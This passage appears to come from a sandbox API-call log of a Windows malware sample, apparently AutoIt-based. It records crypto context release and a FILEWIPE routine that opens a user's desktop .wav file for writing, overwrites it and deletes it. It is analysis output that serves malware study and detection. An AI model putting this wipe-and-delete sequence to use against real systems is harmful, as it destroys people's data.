wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.076] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0031.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.077] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.077] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.077] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0031.077] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0031.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0031.077] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.077] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.077] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0031.077] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0031.077] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.077] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.077] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.077] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.077] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0031.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.078] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.078] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.078] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.078] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0031.078] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.078] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0031.078] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0031.078] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.078] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0031.078] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.078] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0031.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0031.078] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.078] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.078] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0031.078] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.078] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.079] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.079] FreeLibrary (hLibModule=0x754b0000) returned 1 [0031.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0031.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0031.079] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0031.079] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0031.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.079] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.079] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.079] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.079] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.079] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0031.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0031.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.079] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.079] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.079] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x681bcef0, ftCreationTime.dwHighDateTime=0x1d5b666, ftLastAccessTime.dwLowDateTime=0xc4a5bca0, ftLastAccessTime.dwHighDateTime=0x1d5c0b4, ftLastWriteTime.dwLowDateTime=0xc4a5bca0, ftLastWriteTime.dwHighDateTime=0x1d5c0b4, nFileSizeHigh=0x0, nFileSizeLow=0x1575, dwReserved0=0x0, dwReserved1=0x777648, cFileName="EVqXht.wav", cAlternateFileName="")) returned 0x7c2100 [0031.079] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0031.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0031.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.080] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.080] CharLowerBuffW (in: lpsz="byte[5493]", cchLength=0xa | out: lpsz="byte[5493]") returned 0xa [0031.080] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.080] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0031.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.080] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.080] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0031.080] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0031.080] FreeLibrary (hLibModule=0x76b40000) returned 1 [0031.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0031.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0031.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0031.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0031.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0031.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0031.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0031.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0031.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0031.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0031.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0031.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0031.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0031.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0031.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0031.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0031.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0031.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.081] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.081] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.081] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.081] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0031.081] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.081] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.081] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.081] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.081] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.081] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.081] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.082] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.082] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.082] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.082] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.082] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.082] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.082] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.082] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.082] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.082] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0031.082] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.082] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\evqxht.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0031.082] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.082] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.082] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.082] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.082] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0031.083] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.083] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.083] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.083] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.083] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.083] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.083] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.083] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.083] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0031.083] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.083] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.083] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.083] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.083] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.083] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.083] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.083] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav", lpFilePart=0x0) returned 0x48 [0031.084] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x681bcef0, ftCreationTime.dwHighDateTime=0x1d5b666, ftLastAccessTime.dwLowDateTime=0xc4a5bca0, ftLastAccessTime.dwHighDateTime=0x1d5c0b4, ftLastWriteTime.dwLowDateTime=0x126a5300, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1575, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="EVqXht.wav", cAlternateFileName="")) returned 0x7c2100 [0031.084] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\evqxht.wav")) returned 1 [0031.085] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x681bcef0, ftCreationTime.dwHighDateTime=0x1d5b666, ftLastAccessTime.dwLowDateTime=0xc4a5bca0, ftLastAccessTime.dwHighDateTime=0x1d5c0b4, ftLastWriteTime.dwLowDateTime=0x126a5300, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1575, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="EVqXht.wav", cAlternateFileName="")) returned 0 [0031.085] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0031.085] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.085] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0031.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0031.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0031.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0031.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0031.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0031.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.085] CharUpperBuffW (in: 